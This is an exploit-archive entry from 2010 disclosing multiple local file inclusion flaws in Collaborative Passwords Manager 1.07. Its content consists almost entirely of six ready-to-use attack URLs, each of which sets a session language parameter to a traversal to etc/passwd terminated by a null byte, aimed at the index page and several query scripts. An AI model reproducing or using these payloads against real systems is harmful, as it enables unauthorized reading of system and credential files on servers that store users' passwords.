Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Collaborative Passwords Manager 1.07 Multiple Local Include Vulnerabilities
# Published : 2010-09-24
# Author : sh00t0ut
# Previous Title : FreePBX <= 2.8.0 Recordings Interface Allows Remote Code Execution
# Next Title : OvBB v0.16a Multiple Local File Inclusion Vulnerabilities

[~] Collaborative Passwords Manager 1.07 Multiple Local Include Exploit
[~] Found by sh00t0ut
[~] Expl: 
[~] Vendor: http://code.google.com/p/cpassman/downloads/list

http://[victim]/?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00
http://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00